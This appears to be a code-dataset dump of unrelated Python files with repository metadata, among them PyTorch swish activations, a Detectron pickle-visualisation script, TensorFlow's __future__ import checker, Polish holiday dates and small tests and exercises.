memory_efficient (bool, optional):
Whether or not to use an implementation that is more memory efficient at training
time. When ``memory_efficient=True``, this method is incompatible with TorchScript.
.. warning::
This method is traceable with TorchScript when ``memory_efficient=False``, but is
un-scriptable due to the use of :class:`torch.autograd.Function` for a
memory-efficient backward pass. Please export using :func:`torch.jit.trace` with
``memory_efficient=False``
"""
if memory_efficient:
return _SwishFunction.apply(inputs)
else:
return inputs * torch.sigmoid(inputs)
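# Quick illustrative check (not part of the original module): swish is zero
# at zero and approaches the identity for large positive inputs, e.g.
#   swish(torch.tensor([0.0]))   -> tensor([0.])
#   swish(torch.tensor([10.0]))  -> roughly tensor([9.9995])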
class Swish(nn.Module):
r"""The swish activation function, defined as
.. math::
f(x) = x \cdot \text{sigmoid}(x)
.. warning::
This method is traceable with TorchScript, but is un-scriptable due to the
use of :class:`torch.autograd.Function` for a memory-efficient backward pass.
Please export using :func:`torch.jit.trace` after calling ``module.eval()``.
"""
@torch.jit.ignore
def _memory_efficient_forward(self, inputs: Tensor) -> Tensor:
return swish(inputs)
def forward(self, inputs: Tensor) -> Tensor:
        if self.training:
            # Memory-efficient autograd.Function path, matching the
            # docstring above (saves memory during the backward pass).
            return self._memory_efficient_forward(inputs)
        else:
            # Plain eager path, safe for torch.jit.trace after .eval().
            return inputs * torch.sigmoid(inputs)
def hard_swish(inputs: Tensor, inplace: bool = False) -> Tensor:
r"""The hard swish activation function proposed in
`Searching For MobileNetV3`_, defined as
.. math::
f(x) = x \cdot \frac{\text{ReLU6}(x + 3)}{6}
Hard swish approximates the swish activation, but computationally cheaper due to the
removal of :math:`\text{sigmoid}(x)`.
Args:
inputs (Tensor):
The input tensor
inplace (bool, optional):
Whether or not to perform the operation in place.
.. _Searching for MobileNetV3:
https://arxiv.org/abs/1905.02244
"""
if inplace:
return inputs.mul_(F.relu6(inputs + 3, inplace=True).div_(6))
else:
return F.relu6(inputs + 3).div(6).mul(inputs)
class HardSwish(nn.Module):
r"""The hard swish activation function proposed in
`Searching For MobileNetV3`_, defined as
.. math::
f(x) = x \cdot \frac{\text{ReLU6}(x + 3)}{6}
Hard swish approximates the swish activation, but computationally cheaper due to the
removal of :math:`\text{sigmoid}(x)`.
.. image:: ./hswish.png
:width: 600px
:align: center
:height: 300px
:alt: Comparison of Hard Swish and Swish activations.
Args:
inplace (bool, optional):
Whether or not to perform the operation in place.
.. _Searching for MobileNetV3:
https://arxiv.org/abs/1905.02244
"""
def __init__(self, inplace: bool = False):
super().__init__()
self.inplace = inplace
def extra_repr(self):
if self.inplace:
return "inplace=True"
else:
return ""
def forward(self, inputs: Tensor) -> Tensor:
return hard_swish(inputs, self.inplace)
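# Illustrative module usage (a hedged sketch, not part of the original file):
#
#   act = Swish()
#   y = act(torch.randn(8, 16))      # training mode: memory-efficient path
#   act.eval()
#   traced = torch.jit.trace(act, torch.randn(8, 16))   # plain eager path
#
#   hs = HardSwish(inplace=False)
#   z = hs(torch.randn(8, 16))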
| [
"[email protected]"
] | |
f784b3a01ba171e37e1998ab9f4997ed520f1cbe | 22622d1899ac2a37c66d776e317a7c752b2fb10e | /rio/_compat.py | 3e05ed7366dbb45a1f3df523a9be3de33fa28f95 | [
"MIT"
] | permissive | soasme/rio | 64bb3e24580c18951d5eaf84809216785ae35020 | e6b89634db8d3ad75ac7f7b25ddec5b19d4f66e2 | refs/heads/master | 2022-01-23T01:48:17.445050 | 2019-12-30T02:36:50 | 2019-12-30T02:36:50 | 55,581,621 | 0 | 1 | MIT | 2019-12-30T02:39:58 | 2016-04-06T06:34:59 | Python | UTF-8 | Python | false | false | 315 | py | # -*- coding: utf-8 -*-
"""
rio._compat
~~~~~~~~~~~~~
"""
try:
import cPickle as pickle
except ImportError:
import pickle # noqa
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # noqa
try:
import simplejson as json
except ImportError:
import json
| [
"[email protected]"
] | |
c07b1b463ef553ac6896b1ab101ae7c439731385 | c56ffb7215547b658e6698bc4bbe78fbd0e3330b | /3.1 Conditional Statements Advanced - Exercise/02-summerOutfit.py | 9fe22dd121ed0949664396b2184c89cbc50fc5bd | [] | no_license | byAbaddon/Basics-Course-Python-November-2020 | 344646bbb33740d15bec94fd5b5d7cd257df9220 | c6c17a5cdc29121d706bc7677a61637a9bcefbb1 | refs/heads/main | 2023-04-16T01:00:10.000371 | 2023-04-10T20:46:11 | 2023-04-10T20:46:11 | 316,531,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | degrees = int(input())
day_time = input()
result = 0
data_dict = {
'm': {'Morning':'Sweatshirt and Sneakers', 'Afternoon': 'Shirt and Moccasins', 'Evening': 'Shirt and Moccasins'},
'a': {'Morning':'Shirt and Moccasins', 'Afternoon': 'T-Shirt and Sandals', 'Evening': 'Shirt and Moccasins'},
'e': {'Morning':'T-Shirt and Sandals', 'Afternoon': 'Swim Suit and Barefoot', 'Evening': 'Shirt and Moccasins'},
}
if 10 <= degrees <= 18:
result = data_dict['m'][day_time]
elif 18 < degrees <= 24:
result = data_dict['a'][day_time]
elif degrees >= 25:
result = data_dict['e'][day_time]
print(f"It's {degrees} degrees, get your {result}.")
'''
16
Morning
---------------
16
Afternoon
---------------
22
Afternoon
---------------
28
Evening
'''
| [
"[email protected]"
] | |
5fdf39560b8a0d61d2147c8f2ef8cd92fa18f88c | acba214b085dc887cff4398f308e9128667e84cb | /tools/visualize_pickle.py | 9805c22fd25d16bc02db1823f2af8305d00977da | [
"MIT"
] | permissive | achalddave/segment-any-moving_detectron | 4e97e8b78ff1d3e7dab2b39a2491f8f565275e11 | cfa2a756fe8aec183e905b14751e5cb82248a383 | refs/heads/master | 2020-06-24T21:42:30.818633 | 2019-07-27T01:20:54 | 2019-07-27T01:20:54 | 199,099,705 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,782 | py | """Visualize pickle files output by tools/infer_simple.py.
This can be used, for example, if tools/infer_simple.py was initially called
with `--save_images` set to False. It can also be used if the model needs to
be run on one type of input, but the visualizations make more sense on another
type of input (e.g. if the model runs on optical flow, but we want to visualize
on the raw pixels).
"""
import argparse
import collections
import logging
import pickle
from multiprocessing import Pool
from pathlib import Path
from pprint import pformat
import cv2
import numpy as np
from tqdm import tqdm
import _init_paths # noqa: F401
import datasets.dummy_datasets as datasets
import utils.misc as misc_utils
import utils.vis as vis_utils
from datasets import dataset_catalog
def _set_logging(logging_filepath):
"""Setup root logger to log to file and stdout.
All calls to logging will log to `logging_filepath` as well as stdout.
    Also creates a file logger that only logs to `logging_filepath`, which can
be retrieved with logging.getLogger(logging_filepath).
Args:
logging_filepath (str): Path to log to.
"""
log_format = ('%(asctime)s %(filename)s:%(lineno)4d: ' '%(message)s')
stream_date_format = '%H:%M:%S'
file_date_format = '%m/%d %H:%M:%S'
# Clear any previous changes to logging.
logging.root.handlers = []
logging.root.setLevel(logging.INFO)
file_handler = logging.FileHandler(logging_filepath)
file_handler.setFormatter(
logging.Formatter(log_format, datefmt=file_date_format))
logging.root.addHandler(file_handler)
# Logger that logs only to file. We could also do this with levels, but
# this allows logging specific messages regardless of level to the file
# only (e.g. to save the diff of the current file to the log file).
file_logger = logging.getLogger(logging_filepath)
file_logger.addHandler(file_handler)
file_logger.propagate = False
console_handler = logging.StreamHandler()
console_handler.setFormatter(
logging.Formatter(log_format, datefmt=stream_date_format))
logging.root.addHandler(console_handler)
logging.info('Writing log file to %s', logging_filepath)
def subsample_by_parent_dir(paths, subsample_factor):
"""Subsample files at a specified rate by parent directory.
>>> subsampled_paths = subsample_by_parent_dir(
... [Path(x) for x in
    ...      ['a/1.png', 'a/2.png', 'a/3.png', 'a/4.png', 'b/1.png']], 3)
>>> assert len(subsampled_paths) == 3
>>> assert str(subsampled_paths[0]) == 'a/1.png'
>>> assert str(subsampled_paths[1]) == 'a/4.png'
>>> assert str(subsampled_paths[2]) == 'b/1.png'
"""
if subsample_factor == 1:
return paths
import natsort
endings = collections.defaultdict(lambda: 'th',
{1: 'st', 2: 'nd', 3: 'rd'})
pickles_by_dir = collections.defaultdict(list)
for pickle_file in paths:
pickles_by_dir[pickle_file.parent].append(pickle_file)
num_before_subsampling = len(paths)
paths = []
for dir_pickles in pickles_by_dir.values():
paths.extend(
natsort.natsorted(dir_pickles,
alg=natsort.ns.PATH)[::subsample_factor])
logging.info('Subsampling, visualizing every %s frame (%s / %s frames).' %
(str(subsample_factor) + endings[subsample_factor],
len(paths), num_before_subsampling))
return paths
def visualize(image_or_path, pickle_data_or_path, output_path, dataset,
thresh, show_box=False, show_class=False):
if output_path.exists():
return
if isinstance(image_or_path, np.ndarray):
im = image_or_path
else:
assert image_or_path.exists(), '%s does not exist' % image_or_path
im = cv2.imread(str(image_or_path))
if isinstance(pickle_data_or_path, dict):
data = pickle_data_or_path
else:
with open(pickle_data_or_path, 'rb') as f:
data = pickle.load(f)
vis_utils.vis_one_image(
im[:, :, ::-1], # BGR -> RGB for visualization
output_path.stem,
output_path.parent,
data['boxes'],
data['segmentations'],
data['keypoints'],
dataset=dataset,
box_alpha=1.0 if show_box else 0.0,
show_class=show_class,
thresh=thresh,
kp_thresh=2,
dpi=300,
ext='png')
def visualize_unpack(args):
return visualize(**args)
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--pickle-dir', required=True)
parser.add_argument('--images-dir', required=True)
parser.add_argument('--output-dir', required=True)
parser.add_argument('--dataset', required=True, help='training dataset')
parser.add_argument(
'--recursive',
action='store_true',
help="Look recursively in --pickle-dir for pickle files.")
parser.add_argument(
'--images-extension',
default='.png')
parser.add_argument('--threshold', default=0.7, type=float)
parser.add_argument('--num-workers', type=int, default=4)
parser.add_argument(
'--every-kth-frame',
type=int,
default=1,
help=('Visualize every kth frame. Sort all pickle files using '
'a natural sort that will respect frame ordering with typical '
'file names (e.g. "frame001.png" or "001.png" etc.), and '
'only visualize on every k\'th frame. If --recursive is '
'specified, follow this procedure for every directory '
'containing a .pickle file separately.'))
parser.add_argument('--show-box', action='store_true')
parser.add_argument('--show-class', action='store_true')
args = parser.parse_args()
if args.images_extension[0] != '.':
args.images_extension = '.' + args.images_extension
images_root = Path(args.images_dir)
pickle_root = Path(args.pickle_dir)
assert images_root.exists(), '--images-root does not exist'
assert pickle_root.exists(), '--pickle-root does not exist'
output_root = Path(args.output_dir)
output_root.mkdir(parents=True, exist_ok=True)
_set_logging(str(output_root / 'visualization.log'))
logging.info('Args: %s', pformat(vars(args)))
if args.dataset not in dataset_catalog.DATASETS:
raise ValueError("Unexpected args.dataset: %s" % args.dataset)
dataset_info = dataset_catalog.DATASETS[args.dataset]
if dataset_catalog.NUM_CLASSES not in dataset_info:
raise ValueError(
"Num classes not listed in dataset: %s" % args.dataset)
if dataset_info[dataset_catalog.NUM_CLASSES] == 2:
dataset = datasets.get_objectness_dataset()
    elif dataset_info[dataset_catalog.NUM_CLASSES] == 81:
        dataset = datasets.get_coco_dataset()
    else:
        raise ValueError('Unsupported number of classes: %s' %
                         dataset_info[dataset_catalog.NUM_CLASSES])
if args.recursive:
detectron_outputs = list(pickle_root.rglob('*.pickle')) + list(
pickle_root.rglob('*.pkl'))
else:
detectron_outputs = list(pickle_root.glob('*.pickle')) + list(
            pickle_root.glob('*.pkl'))
if args.every_kth_frame != 1:
detectron_outputs = subsample_by_parent_dir(detectron_outputs,
args.every_kth_frame)
relative_paths = [x.relative_to(pickle_root) for x in detectron_outputs]
images = [
images_root / x.with_suffix(args.images_extension)
for x in relative_paths
]
outputs = [output_root / x.with_suffix('.png') for x in relative_paths]
tasks = []
for image_path, pickle_path, output_path in zip(images, detectron_outputs,
outputs):
if output_path.exists():
continue
output_path.parent.mkdir(exist_ok=True, parents=True)
tasks.append({
'image_or_path': image_path,
'pickle_data_or_path': pickle_path,
'output_path': output_path,
'dataset': dataset,
'thresh': args.threshold,
'show_box': args.show_box,
'show_class': args.show_class
})
if not tasks:
logging.info('Nothing to do! Exiting.')
return
if args.num_workers == 0:
list(map(visualize_unpack, tqdm(tasks)))
else:
args.num_workers = min(args.num_workers, len(tasks))
pool = Pool(args.num_workers)
results = pool.imap_unordered(visualize_unpack, tasks)
list(tqdm(results, total=len(tasks))) # Show progress bar
if __name__ == "__main__":
main()
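# Example invocation (illustrative; the paths and dataset name below are
# assumptions, not taken from the original repository):
#   python tools/visualize_pickle.py \
#       --pickle-dir /out/detections --images-dir /data/frames \
#       --output-dir /out/vis --dataset my_dataset \
#       --images-extension .jpg --threshold 0.7 --num-workers 4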
| [
"[email protected]"
] | |
6684bd853d6ef7bafa5052fab25a9722778e5c79 | a193a941a9f70dd0aa46e7a402265bfff27bb075 | /tests/codecs/formats/test_wav.py | ea60a4ef2fba103e2ff55f42f4466be82d316a33 | [
"0BSD"
] | permissive | hile/oodi | f3c606b5209c2b05e077d9039104df7187ba0b1c | f3a758238033c0a511e1ecffbb4b5bfde70efbda | refs/heads/main | 2023-04-13T07:07:03.535176 | 2023-04-10T07:17:44 | 2023-04-10T07:17:44 | 196,691,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | """
Unit tests for oodi.codecs.formats.wav module
"""
from pathlib import Path
from oodi.codecs.constants import CodecFormat
from oodi.codecs.formats.wav import Wav
from .validators import validate_codec_properties, TEST_FILENAME_NO_MATCH
TEST_FILENAME_MATCH = f'test case.{CodecFormat.WAV.value}'
def test_codecs_formats_wav_properties(mock_empty_config):
"""
Test properties of the Wav codec class
"""
validate_codec_properties(Wav(mock_empty_config), mock_empty_config.__path__)
def test_codecs_formats_wav_match_file_no_match(mock_empty_config, tmpdir):
"""
Test matching unexpected filename to wav codec
"""
assert Wav(mock_empty_config).match_file(Path(tmpdir.strpath, TEST_FILENAME_NO_MATCH)) is False
def test_codecs_formats_wav_match_file_matches(mock_empty_config, tmpdir):
"""
Test matching a wav filename to wav codec
"""
assert Wav(mock_empty_config).match_file(Path(tmpdir.strpath, TEST_FILENAME_MATCH)) is True
| [
"[email protected]"
] | |
e5071c6b16895e33b46c923d938f1b8ff8361ee1 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/tools/test/check_futures_test.py | f0c4d0d47930e2ca716933f9f677440922daf5ca | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 4,053 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Check that TensorFlow python files have certain __future__ imports.
This makes it easier to find Python 2.7 / Python 3.x incompatibility bugs.
In particular, this test makes it illegal to write a Python file that
doesn't import division from __future__, which can catch subtle division
bugs in Python 3.
Note: We can't use tf.test in this file because it needs to run in an
environment that doesn't include license-free gen_blah_ops.py files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import six
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
FUTURES_PATTERN = re.compile(r'^from __future__ import (\w+)\s*$')
FUTURES_PATTERN_2 = re.compile(
r'^from __future__ import (\w+), (\w+), (\w+)\s*$')
FUTURES_PATTERN_3 = re.compile(r'^from __future__ import (\w+) as \w+\s*$')
REQUIRED_FUTURES = frozenset(['absolute_import', 'division', 'print_function'])
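# For reference, a file header that satisfies the check looks like this
# (illustrative):
#   from __future__ import absolute_import
#   from __future__ import division
#   from __future__ import print_function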
WHITELIST = [
'python/platform/control_imports.py',
'tools/docker/jupyter_notebook_config.py',
'tools/ci_build/update_version.py',
'tools/ci_build/copy_binary.py',
]
# Tests that must *not* import division
OLD_DIVISION = [
'python/framework/tensor_shape_div_test.py',
'python/kernel_tests/division_past_test.py',
]
def check_file(path, old_division):
futures = set()
count = 0
for line in open(path, encoding='utf-8') if six.PY3 else open(path):
count += 1
m = FUTURES_PATTERN.match(line)
if not m:
m = FUTURES_PATTERN_3.match(line)
if m:
futures.add(m.group(1))
else:
m = FUTURES_PATTERN_2.match(line)
if m:
for entry in m.groups():
futures.add(entry)
if not count:
return # Skip empty files
if old_division:
# This file checks correct behavior without importing division
# from __future__, so make sure it's doing that.
expected = set(['absolute_import', 'print_function'])
if futures != expected:
raise AssertionError(('Incorrect futures for old_division file:\n'
' expected = %s\n got = %s') %
(' '.join(expected), ' '.join(futures)))
else:
missing = REQUIRED_FUTURES - futures
if missing:
raise AssertionError('Missing futures: %s' % ' '.join(missing))
def main():
# Make sure BASE_DIR ends with tensorflow. If it doesn't, we probably
# computed the wrong directory.
if os.path.split(BASE_DIR)[-1] != 'tensorflow':
raise AssertionError("BASE_DIR = '%s' doesn't end with tensorflow" %
BASE_DIR)
# Verify that all files have futures
whitelist = frozenset(os.path.join(BASE_DIR, w) for w in WHITELIST)
old_division = frozenset(os.path.join(BASE_DIR, w) for w in OLD_DIVISION)
for root, _, filenames in os.walk(BASE_DIR):
for f in fnmatch.filter(filenames, '*.py'):
path = os.path.join(root, f)
if path not in whitelist:
try:
check_file(path, old_division=path in old_division)
except AssertionError as e:
short_path = path[len(BASE_DIR) + 1:]
raise AssertionError('Error in %s: %s' % (short_path, str(e)))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0fb2282d3b84448e01b5dcc2f4bd64681db1bbb0 | fabc3b3286df0fa98a35ea90d4693d9f38db50a2 | /sendJsonRequest.py | a84652870f3a942e8fd181669bc76831b3cc1e21 | [] | no_license | yangtou45du/openpyxl | 750b5ee23ce8e5cb6826b8cc137012fbf2a5d9cb | 87eef380391e60eab81f93c7742d1c21b1d029de | refs/heads/master | 2020-03-16T21:59:35.078761 | 2018-05-31T03:42:03 | 2018-05-31T03:42:03 | 133,022,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import requests
import json
class sendRequest():
    def POST(self, url, payload):
        # Send the payload as a JSON body; `requests` sets the Content-Type.
        response = requests.post(url, json=payload)
        return response.text
if __name__ == '__main__':
url="http://221.236.20.217:8093/pcl/services/loanCenter/account/queryPaymentHistory"
    payload = {
"params": {
"loanNo": "000002017090601542",
"isPage":1,
"pageSize":"10",
"pageNo":"1"
}
}
    response_text = sendRequest().POST(url, payload)
    print(response_text)
| [
"[email protected]"
] | |
b2b7e8daf9b2c2a4bda8d9a8c6010bce4bba22d7 | 42b324291b51b14e284a8c5e14270a4e9446737a | /test27.py | c4d5021a0c518bc02be33130f9503d78c638d5d9 | [] | no_license | christinecoco/python_test | 3f7505c85711eb6bff27cbc68bfd3fd9829a843d | 6d6c519e237f1d9e7243e3e6378a0ca44af98439 | refs/heads/master | 2020-05-23T22:26:58.341688 | 2019-05-16T07:23:28 | 2019-05-16T07:23:28 | 186,973,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #将用户输入的5个字符以相反顺序打印出来
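# Print the 5 characters entered by the user in reverse order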
def pri():
l=[]
l.extend(n)
l.reverse()
return l
n = input('Enter 5 characters: ')
print(pri()) | [
"[email protected]"
] | |
59773eb3cc899c7e48f6283380f46e6b5d8902c3 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/pyinstaller/tests/old_suite/interactive/test_pygame.py | bc4b2ab4e66186771f7e4675c2622bd8225cad3d | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:82d416a54f2704d7f86702c9d4fca758c3922aabd54f55bd79bc5d55d8cb8592
size 8156
| [
"[email protected]"
] | |
8a43127609e4f347391453d0dab8d410e2ee6d3d | dc456b315dc6988fbc37a92e8c1af8987205c9fa | /holiday/countries/poland.py | 5d59cee331e259533d6991ba00d5467cc7251f70 | [
"MIT"
] | permissive | Lionbridge-Technologies/holiday | 83bf8e0d665828e75429b519e3b85294475ecb64 | e8fa1628efdc81ed2f3452cf7009de605968cb76 | refs/heads/master | 2021-01-13T08:58:09.830066 | 2013-11-10T21:50:58 | 2013-11-10T21:50:58 | 69,601,979 | 0 | 1 | null | 2016-09-29T19:46:17 | 2016-09-29T19:46:16 | null | UTF-8 | Python | false | false | 1,582 | py | # -*- coding: utf-8 -*-
'''Holiday information for Poland. Adapted from
https://gist.github.com/sebzur/1810707
'''
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from datetime import date, timedelta
from dateutil import easter
from dateutil.relativedelta import relativedelta, SU, TH
def get_holidays(year, place=['Poland', None, None], scope='legal', _=str):
"""Returns Polish holiday dates (legally considered non-working days)."""
easter_sunday = easter.easter(year)
return {
date(year, 1, 1): _('New Year'),
date(year, 1, 6): _('Trzech Kroli'),
easter_sunday: _('Easter Sunday'),
easter_sunday + timedelta(days=1): _('Easter Monday'),
date(year, 5, 1): _('Labor Day'),
date(year, 5, 3): _('Constitution Day'),
# 7th Sunday after Easter
# (notice days+1 - this is 7th Sunday excluding Easter Sunday
easter_sunday + relativedelta(days=+1, weekday=SU(+7)):
_('Pentecost Sunday'),
# 9th Thursday after Easter
easter_sunday + relativedelta(weekday=TH(+9)):
_('Corpus Christi'),
date(year, 8, 15): _('Assumption of the Blessed Virgin Mary'),
date(year, 11, 1): _("All Saints' Day"),
date(year, 11, 11): _('Independence Day'),
date(year, 12, 25): _('Christmas Day'),
date(year, 12, 26): _('Boxing Day'),
} # What the hell, you don't celebrate Chopin's birthday???
if __name__ == "__main__":
from pprint import pprint
pprint(get_holidays(2014))
| [
"[email protected]"
] | |
2d40f0bfb1b559ceab1fa73202905567d7c26083 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/imooc_advanced/对象迭代与反迭代/part5.py | 3baf32b97753c3d1764be42a9bf4906e61683e3c | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | # 如何对迭代器做切片操作
# Real-world case: given a text file, we want to read a range of its content,
# e.g. the lines between 100 and 300. In Python a text file object is
# iterable - can we get a generator over lines 100-300 with list-style slicing?
# f=open('')
# f[100:300]  # would this work? (no - file objects do not support slicing)
# Solution: use itertools.islice from the standard library; it returns a
# generator over a slice of any iterable object.
from itertools import islice
f=open('part1.py',encoding='utf-8')
# for x in f:
# print(f.readline())
for line in islice(f,2,5):
print(line)
# islice(f, 2)        # first 2 lines
# islice(f, 2, None)  # from line 2 to the end
# islice consumes the underlying iterator as it advances
l=range(20)
t=iter(l)
for x in islice(t,4,8,1):
print(x,end=' ')
print()
for x in t:
print(x,end=' ')
| [
"yaolihui0506"
] | yaolihui0506 |
21f5c6a34e88da9ea700f99dfdcc7834a7aefe05 | 6ead0d3997aa3470fc6f49c6ccc0ac8f808ae5d7 | /problems/python/findPeakElement.py | 54ddbd13b948a36ca234c81c0125b7d55d9dc703 | [] | no_license | ikedaosushi/leetcode | d405455bfffda3057259da78783901feb56d9f76 | d378f2dc5f0b2df1f00208e304979ac0f53ab385 | refs/heads/master | 2021-06-24T04:31:56.586685 | 2020-12-08T13:51:18 | 2020-12-08T13:51:18 | 178,659,078 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
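        # Strategy: check the two ends of the array first, then scan the
        # interior for an element strictly greater than both neighbours.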
if len(nums) <= 1:
return 0
if nums[0] > nums[1]:
return 0
if nums[-2] < nums[-1]:
return len(nums) - 1
i = 1
while i < len(nums) - 1:
if nums[i] > nums[i+1]:
if nums[i-1] < nums[i]:
return i
i += 1
i += 1
return 0
| [
"[email protected]"
] | |
251e492a5dd723d7807866355d7f4487306bc38d | 0a7711063b30b1566ade3cc07f105292e32fe6d6 | /scrapy_test/aggregates/apartment/tests/integration/test_apartment_behavior.py | 2c4e1054d5b46d3ecaff69fa4cd40a24006fb188 | [] | no_license | huokedu/dynamic-scrapy | e150a1fc6894e39d6bae37c602a592d57cd22c51 | 31a47e9810f2039cfe33653e09d7d03242764723 | refs/heads/master | 2021-01-17T21:33:17.810250 | 2013-10-05T17:28:19 | 2013-10-05T17:28:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | import pytest
from scrapy_test.aggregates.apartment.services import apartment_service
from scrapy_test.aggregates.listing.models import Listing
from scrapy_test.aggregates.listing.services import listing_service
from scrapy_test.aggregates.listing.tests import listing_test_data
@pytest.mark.django_db_with_migrations
def test_apartment_publishes_notified_unavailable():
listing_id = listing_service.create_listing(**listing_test_data.cl_listing_4033538277).id
listing = Listing.objects.get(pk=listing_id)
apartment = listing.apartment
apartment_service.notify_unavailable(apartment)
assert apartment.is_available == False
listings = Listing.objects.filter(apartment=apartment).values_list('is_deleted', flat=True)
assert all(f == True for f in listings)
| [
"[email protected]"
] | |
12808eccde179a2a86faac55bccb1419289b162f | cc20c7658fdf4fa7506625c9efdae792dfd857ce | /src/visionlouisville/utils.py | 8f17dc56324ff01681c7cff2368133b2fa2a242e | [] | no_license | openplans/visionlouisville | 4a9972adc97af0048c4f7c0cd8f642bef59e69cf | e4dc182d061866e80ae140a887bba1b0e967753c | refs/heads/master | 2020-05-20T13:25:47.273430 | 2013-10-24T16:27:47 | 2013-10-24T16:27:47 | 10,971,764 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | from django.conf import settings
from itertools import combinations, islice
from random import randint
def uniquify_tweet_ids(queryset):
"""Ensure that the tweet_ids of all items in the queryset are unique"""
all_different = False
while not all_different:
all_different = True
        for reference, other in combinations(queryset, 2):
if reference.tweet_id == other.tweet_id:
all_different = False
other.tweet_id = str(randint(0, 9999999999999999))
other.save()
def chunk(iterable, n):
"""Collect data into fixed-length chunks"""
it = iter(iterable)
while True:
item = list(islice(it, n))
if item: yield item
else: break
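# Illustrative behaviour of chunk() (not part of the original module):
#   list(chunk(range(7), 3)) == [[0, 1, 2], [3, 4, 5], [6]]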
def settings_context(request):
return {'settings': settings} | [
"[email protected]"
] | |
9c6f84e5b09a323ccaef53d84b0b723bb457f244 | 11286e7989264134a8a8d610e0f609e6fbff9140 | /ch13/ch13_21.py | 9e23fcd51d42b42990d05ad987311aa76e6f5225 | [] | no_license | p2c2e/machine_learning_with_python_cookbook | 04eeed2e00e0a3e9c0681d4b2f4125aa85485a1d | b176323a02f5b5722e312a579ad764a0276ec9c6 | refs/heads/main | 2023-01-30T06:54:34.138786 | 2020-12-13T05:02:07 | 2020-12-13T05:02:07 | 320,987,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | # View coefficients
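# A hedged note (not in the original snippet): this cookbook fragment assumes
# `model` is an already-fitted scikit-learn linear model, e.g.
#   from sklearn.linear_model import LinearRegression
#   model = LinearRegression().fit(features, target)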
model.coef_ | [
"[email protected]"
] | |
19e37018d09be7a049a1eb9e51bdf5f7e821a01a | 46c38a849a96ca868b1efaa8280be7416e15f952 | /goslinks/blueprints/auth.py | 3fc63ffc1366208b6bd7351e53fdf2521ccce5a9 | [
"ISC"
] | permissive | RevolutionTech/goslinks | 066b7f08a05bb68b6440bab4e670e537d0f1960f | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | refs/heads/main | 2023-02-20T17:25:50.052529 | 2021-10-16T23:19:28 | 2021-10-16T23:19:28 | 184,518,945 | 1 | 0 | ISC | 2023-02-08T00:51:24 | 2019-05-02T04:07:12 | Python | UTF-8 | Python | false | false | 500 | py | from flask import Blueprint, redirect, session
from goslinks.auth.constants import AUTH_EMAIL_KEY, AUTH_NEXT_URL_KEY
from goslinks.auth.decorators import no_cache
bp = Blueprint("auth", __name__)
@bp.route("/logout/")
@no_cache
def logout():
# Deprecated session variables, to be removed after 2020/10/13
session.pop("auth_token", None)
session.pop("auth_state", None)
session.pop(AUTH_NEXT_URL_KEY, None)
session.pop(AUTH_EMAIL_KEY, None)
return redirect("/", code=302)
| [
"[email protected]"
] | |
269883af7e8c26cec4f9f1501eb31440733b33e5 | 2534803a09f5a6676ccece4519a2b8faaea9329d | /zeno/test/propagate/helper.py | dc33a738b861d6a9fd3e317a8adb5d9b0f2649da | [
"Apache-2.0"
] | permissive | SmithSamuelM/plenum | c41ccb849cd1113ba8496fa8bd9b0c5336ee9878 | 2675523f8718d6f240027582bc90c76b4f80c105 | refs/heads/master | 2021-01-15T23:35:53.640499 | 2016-02-16T05:01:22 | 2016-02-16T05:01:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | from zeno.common.request_types import Propagate
from zeno.test.helper import TestNode, getAllArgs
def sentPropagate(node: TestNode):
params = getAllArgs(node, TestNode.send)
